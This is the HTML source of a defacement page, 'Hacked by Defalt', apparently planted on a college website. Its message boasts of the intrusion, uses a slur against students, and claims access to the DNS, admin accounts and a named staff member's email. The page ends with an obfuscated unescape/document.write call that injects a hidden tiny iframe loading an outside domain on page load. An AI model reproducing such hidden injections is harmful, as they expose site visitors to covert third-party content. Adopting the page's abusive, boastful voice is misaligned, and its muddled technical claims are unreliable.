<html>
 
 
 
        <head>
 
               
 
                <title></title>
 
               
 
                <script>
 
                        <--
 
                                var ScrollMsg= "Hacked by Defalt "
 
                                var CharacterPosition=0;
 
                                function StartScrolling() {
 
                                document.title=ScrollMsg.substring(CharacterPosition,ScrollMsg.length)+
 
                                ScrollMsg.substring(0, CharacterPosition);
 
                                CharacterPosition++;
 
                                if(CharacterPosition > ScrollMsg.length) CharacterPosition=0;
 
                                window.setTimeout("StartScrolling()",150); }
 
                                StartScrolling();
 
                        // -->
 
                </script>
 
               
 
        </head>
 
       
 
        <body style="background-color: black; background-image: url('http://www.animateit.net/data/media/june2010/animated_60.gif'); background-repeat: repeat;">
 
                <div style="position: absolute; left: 50%; margin-left: -350px;">
 
                <div style="display: table; background-color: rgba(000, 000, 000, 0.8); margin-top: 50px;">
 
                        <div style="font-family: impact; font-size: 75px; color: rgba(0, 255, 255, 0.2); background-color: none; text-shadow: 1px 1px rgba(131, 139, 139, 0.2); padding-top: 25px; text-align: center; line-height: 75px; height: 75px;">
 
                               
 
                                Hacked by Defalt
 
                               
 
                        </div>
 
                <pre style="color: #00E5EE; margin: 0 auto; font: 6px/3px monospace; width: 700px; text-align: center; padding: 35px 35px 50px 50px; border: 0;">
 
                                                                      `````````````````                                              
 
                                                       .@@@     `````````````````````````````                                        
 
                                                     :@@@@@`````````````````````````````````````                                      
 
                                                   :@@@@@@@@```````````````````````````````````````                                  
 
                                                  @@@@@@@@@@````````````,`````````````````````````````                                
 
                                                +@@@@@@@@@@@:`````````@@+@@`````````````````````````````                              
 
                                               @@@@@@@@@@@@@@``````;@#+++++@@`````````````````````````````                            
 
                                              @@@@@@@@@@@@@,````.@@++++++++++@@````````````````````````````                          
 
                                            `@@@@@@@@@@@+`````````,@#+++++++++#@;````````````````````````````                        
 
                                           `@@@@@@@@@@##@@@@@@@##@::,@#+++++++++@@:```````````````````````````                        
 
                                          `@@@@@@@@@@;;;;;;;;;;;;#@:::;;''++##@@#+@@.```````````````````````````                      
 
                                        ```@@@@@@@@@@@@##++'';;;;'#:::::::::::::@++@@@```````````````````````````                    
 
                                      `````@@@@@@@``````````.,:;'##@@@@@@@@@@@@#@+++@@@```````````````````````````                    
 
                                     `````;@@@@@@```````````````````````````@#++++++@@@````````````````````````````                  
 
                                   ```````#@@@@@`````````````````````````````,@+++++@@@`````````````````````````````                  
 
                                  ````````@@@@@;::,,..`````````````````````````@#++@@@@;`````````````````````````````                
 
                                 `````````@@@@#:::::;;;;'''++++##@#@@@@@@@@@@@@@@@@@@@@#``````````````````````````````                
 
                                ``````````+@@@:::::::::::::::::::#..............:@@@@@@@``````````````````````````````                
 
                              ````````````.@@@###@+'''++++####@@@@@@@@@@@@@@@@@@@@@@@@@#```````````````````````````````              
 
                             ``````````````@@+++++##`````````````````````````,@@@@@@@@@:````````````````````````````````              
 
                            ```````````````@@+++++++@``````````````````````.@@@@@@@@@@@``````````````````````````````````            
 
                           `````````````````@@+++++++@+``````````````````,@@@@@@@@@@@@:``````````````````````````````````            
 
                          ```````````````````@#++@:;;;;;;;;;;;;@#++++++@@@@@@@@@@@@@@`````````````````````````````````````            
 
                         `````````````````````@#+@,,,,,,,,,,,,';;;;;'@@@@@@@@@@@@@@@``````````````````````````````````````            
 
                        ```````````````````````@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,````````````````````````````````````````          
 
                       `````````````````````````@@++++++++++++@@@@@@@@@@@@@@@@@@#``````````````````````````````````````````          
 
                      ````````````````````````````@@+++++++++@@@@@@@@@@@@@@@@@@`````````````````````````````````````````````          
 
                     ``````````````````````````````;@#++++@@@@@@@@@@@@@@@@@@@```````````````````````````````````````````````          
 
                     ````````````````````````````````'@@@@@@@@@@@@@@@@@@@@@``````````````````````````````````````````````````        
 
                    ``````````````````````````````````#@@@@@@@@@@@@@@@@@+````````````````````````````````````````````````````        
 
                   `````````````````````````````````@@@@@@@@@@@@@@@@@@@+@@```````````````````````````````````````````````````        
 
                  ````````````````````````````````@@@@@@@@@@@@@@@@@@..#+++@@``````````````````````````````````````````````````        
 
                  ``````````````````````````````'@@@@@@@@@@@@@@@@,.....#++++@@````````````````````````````````````````````````        
 
                 ``````````````````````````````@@@@@@@@@@@@@@+.,:@@@@@@++++++#@;``````````````````````````````````````````````        
 
                `````````````````````````````.@@@@@@@@@@@@#````````+@++++++++++@@,````````````````````````````````````````````        
 
                ````````````````````````````.@@@@@@@@@@@@@@#';,.`````'@++++++++++@@.``````````````````````````````````````````        
 
               `````````````````````````````@@@@@@@@@@@::::::::;'+@@@@@@@@@@@@@@@+@@@``````````````````````````````````````````      
 
               ````````````````````````````@@@@@@@@@@::::::::::::::@.............+++@@+````````````````````````````````````````      
 
              `````````````````````````````@@@@@@@@`.,:;;++@@@@@@@@@@@##+';::,...,#++@@@```````````````````````````````````````      
 
             `.............................@@@@@@#...........................@###@+++@@@,......................................      
 
             ..............................@@@@@#.............................;@+++++#@@@......................................      
 
            `.............................;@@@@@................................@#+++@@@@......................................      
 
            ..............................'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##+++'''+@#@@@@@......................................      
 
            ..............................;@@@@;;;;;;;;;;;;;;;;;;@................#@@@@@@......................................      
 
           ...............................,@@@@@@@@@@@@@@@@@@@@@@@@##++'';;::,,..@@@@@@@@......................................      
 
           ................................@@@+++#@............................,@@@@@@@@@......................................      
 
          `................................@@++++++@..........................@@@@@@@@@@@......................................      
 
          .................................'@+++++++@;......................@@@@@@@@@@@@.......................................      
 
          ..................................#@++++#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@........................................      
 
         ....................................@@+++@.............@::::::#@@@@@@@@@@@@@@.........................................      
 
         .....................................@@++#@;;;;;;''''''@''''@@@@@@@@@@@@@@@,.........................................`      
 
         ......................................+@+++++++++++@@,...'@@@@@@@@@@@@@@@@...........................................`      
 
        `........................................@#++++++++++++@@@@@@@@@@@@@@@@@@.............................................        
 
        ..........................................@@++++++++#@@@@@@@@@@@@@@@@@@,..............................................        
 
        ............................................@@++++@@@@@@@@@@@@@@@@@@@,................................................        
 
        ..............................................@@@@@@@@@@@@@@@@@@@@@...................................................        
 
        ..............................................#@@@@@@@@@@@@@@@@@@....................................................        
 
       `............................................#@@@@@@@@@@@@@@@@@@++@@..................................................        
 
       ...........................................'@@@@@@@@@@@@@@@@''''@+++@@................................................        
 
       ..........................................@@@@@@@@@@@@@@@@@###++@++++#@'.............................................`        
 
       ........................................:@@@@@@@@@@@@@;....@@++++++++++#@,...........................................          
 
       .......................................;@@@@@@@@@@@#.........+@++++++++++@@,.........................................          
 
       ......................................,@@@@@@@@@@'+@@@@@@@##';:'@++++++++++@@.......................................`          
 
       ......................................@@@@@@@@@;::::::::::::@....,::;'++#@@+@@@.....................................          
 
       .....................................:@@@@@@@@@@@##+'';:::::@..............@+@@@,...................................          
 
       .....................................@@@@@@@'...........,:;+##@@@@@@@@@@@@@#++@@@..................................            
 
       .....................................@@@@@@:..........................,@+++++++@@#.................................            
 
       .....................................@@@@@'.............................#@++++@@@@................................            
 
       .....................................@@@@@;;:::,,.........................@++#@@@@................................            
 
       .....................................@@@@''''''''+++++#####@#@@@@@@@@@@@@@@@@@@@@@...............................              
 
       .....................................@@@@''''''''''''''''''@;;;;;;;;;;;;;;;@@@@@@@...............................              
 
       .....................................@@@####@'''++++####@@@@@@@@@@@@@@@@@@@@@@@@@@..............................              
 
       `....................................+@@+++++@..........................#@@@@@@@@@..............................              
 
        .....................................@@++++++@,......................+@@@@@@@@@@@.............................                
 
        .....................................#@+++++++#@...................#@@@@@@@@@@@@.............................                
 
        ......................................#@++#+::::::::::::'@;'''''+@@@@@@@@@@@@@@..............................                
 
        .......................................@@+#.............@:::::+@@@@@@@@@@@@@@:..............................                  
 
         .......................................#@+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...............................                  
 
         ........................................,@++++++++++++@@#@@@@@@@@@@@@@@@@,...............................`                  
 
         ..........................................@@++++++++++@@@@@@@@@@@@@@@@@'.................................                    
 
          ...........................................@#+++++@@@@@@@@@@@@@@@@@@+..................................                    
 
          ............................................:@##@@@@@@@@@@@@@@@@@@'...................................                      
 
          .............................................:@@@@@@@@@@@@@@@@@@:....................................                      
 
           ..........................................:@@@@@@@@@@@@@@@@@@@@....................................`                      
 
           ........................................:@@@@@@@@@@@@@@@@@''@++@@.................................`                        
 
            ......................................@@@@@@@@@@@@@@@@+;;;;@++++@@..............................`                        
 
            `...................................;@@@@@@@@@@@@@@@#@@@@@@@++++++@@...........................`                          
 
             ..................................#@@@@@@@@@@@@;......'@++++++++++#@'........................`                          
 
              ................................@@@@@@@@@@@@';:........:@#+++++++++@@;.....................`                            
 
              ...............................'@@@@@@@@@@:::::;'+#@@@@@@@@@@@@@@###+@@,..................                              
 
               ..............................@@@@@@@@@::::::::::::::@............,@+@@@................                              
 
                ............................,@@@@@@@++#@@@@@@@@@@@#@';;:,.........@++@@@..............                                
 
                 ...........................#@@@@@@,....................,,:;;@@@@@@+++@@@............                                
 
                 `..........................@@@@@@............................,@++++++@@@..........`                                  
 
                  `.........................@@@@@,..............................#@+++#@@@:........                                    
 
                   `........................@@@@@@@@@@@@@@@@@@@##++#'';;;;:::,,,.,@+#@@@@+.......                                    
 
                    `.......................@@@@';;;;;;;;;;;;;;;;;;@''''''''''+++++@@@@@@@.....                                      
 
                      ......................@@@@@@@@@@########+++++@++++'''''''''#@@@@@@@@...`                                        
 
                       .....................#@@@@@@@@..................,,::;;''+@@@@@@@@@#..                                          
 
                        .....................@@@@@@@@@,......................,@@@@@@@@@@@,                                            
 
                          ...................@@@@@@@@@@#....................@@@@@@@@@@@@@                                            
 
                           ...................@@@@@@@@@@@,................@@@@@@@@@@@@@@                                              
 
                             .................:@@@@@@@@@@@#.............@@@@@@@@@@@@@@@                                              
 
                               ................@@@@@@@@@@#..............@@@@@@@@@@@@@,                                                
 
                                 .,,,,,,,,,,,,,,@@@@@@@@,,,,,,,,,,,,,,,,,@@@@@@@@@@@                                                  
 
                                   `,,,,,,,,,,,,,:@@@@#,,,,,,,,,,,,,,,,,,,#@@@@@@@`                                                  
 
                                       ,,,,,,,,,,,,@@,,,,,,,,,,,,,,,,,,,`  ;@@@@:                                                    
 
                                          `.,,,,,,,,,,,,,,,,,,,,,,,.`       ,@;                                                      
 
                                                ``..,,,,,,,..`                                                                        9
 
                </pre>
 
        <div style="margin: 0 0 50px 0;">
 
                <div style="background-color: rgba(000, 000, 000, 0.2); display: table; text-align: center; width: 640px; margin: 0 auto; border: 1px solid rgba(255, 255, 255, 0.3); color: rgba(255, 255, 255, 0.2); font-weight: bold; font-family: verdana; font-size: 16px; line-height: 16px; padding: 20px 30px;">
 
                        <h1>Message from Defalt</h1>
 
                        <span style="margin-top: -10px; padding-bottom: 25px;">---------------------------------------------------------------------------</span>
 
                                <span style="color: rgba(255, 255, 255, 0.3);">Hello, Cambridge Institute of Technology. This Official Website of Cambridge has suffered the attack of ghosts that runs through the digital wires. People who are visiting this website at a real time, I want you to know some REAL basics what colleges play these day, specially, this one. Cambridge Institute of Technology, which claims to
provide you high-end education is really not that trusted as it may seem. Well straight forward, this institution does not
provide Knowledge, it provides marks, takes decision upon attendance and loots poor people by their so called management
admissions. I will expose some details later, but let me explain my personal reason to hack this. Yeah I did not attended
the classes that much, but I don't think many of other people at this college are out there who can restore this website, or who
atleast know how to code! I code my own exploits and break in. Like really, out of 100%, 20% are basically retards not knowing why he/she took a certain branch,
out of that 80%, even more 30% are students who thinks that "marks" are really great, but SAD they fail here at this point.
Rest 50% of students here are mediocore performers, they know things, but they are really never given the change, in what they
are interested in. Sometimes you can really play a critical role in a life of a student, but guess what? Our professors here
are so great, whose web administration department gets h by a 1st Year Computer Science Student. Hi, I am the 1%, who knows
all your secrets. I am the one, who does not run behind "marks", and attendance, and still I possess some knowledge, which
most of the student (atleast not in Cambridge) does have ;) I am that 1% which has access to your secrets, I flow with the
information, knowledge is what surrounds me, things are ought to be changed. On May 23rd and repeteadly on 26th December 2011,
I had brought into notice for both the time, that THIS particular website is going to get hacked, they fixed up all the security there,
But still, they did not permitted me to go through the directory, instead they "DETAINED" me on the basis of "Attendance Problem",
which I had, but how come some of the cash worthy people managed to get the HALL TICKET?. Oh, I get it, you people are behind money?
Are you? You know what? I can reformulate a credit card bin to a decoded BIN translation, decrypting the 128 bit Encryption system. I don't rely on your degree, because my knowledge on Computer science is more costly than your SHIT College. Google "Hacked by Team OpenFire" and you'll come to know with whom you have messed. Well there are more things to say, Wanna know how I did it, because your talented College Professors won't know this, I penterated your DNS, infected it with a custom coded malware and designed it such a way that it creates a command shell whenever the admin access it, now this causes a DNS Poisoning procedure, which follows a sub-routine and yeah, I have access to ADMIN, your DNS, nameservers, MX Records and gmail accounts, yeah Mr.Guruprasad, check out your gmail accounts, both rediffmail and gmail are hacked, full access with Wipro and Citech Project documents and resume. You call yourself "Teachers"? Meet me, I am ʍя.яąţ, the root of the Hackers, mess with the BEST, Die like the rest. Pwned and Owned. To trace me, you gotta be fast, to track me, you gotta be smart, but to be like me, you gotta be kidding ;) My next targets are corrupt officials, I am going to expose all of them. Expect me!</span>
 
                        <div style="display: block; margin-top: 25px;">
 
                                <span style="float: left; margin-left: 50px; font-size: 12px; margin-top: 3px; line-height: 12px;">
 
                                        Sincerely, Defalt.
 
                                </span>
 
                                <span style="float: right; margin-right: 50px; font-size: 10px; color: rgba(255, 255, 255, 0.5);">
 
                                        "Seek the truth, it leads you to the facts!"
 
                                </span>
 
                        </div>
 
                </div>
 
        </div>
 
        </div>
 
        <div style="width: auto; margin: 0 auto; display: block; background-color: none; border: 0; height: 50px;"></div>
 
        </div>
 
        </body>
 
       
 
<a href="http://www.devilscafe.in" target="_blank"><img src="" /></a><script>
<!--
document.write(unescape("%3Ciframe%20frameborder%3D%225%22%20height%3D%225%22%20src%3D%22http%3A//media.devilscafe.in%22%20width%3D%225%22%3E%3C/iframe%3E"));
//-->
</script></html>
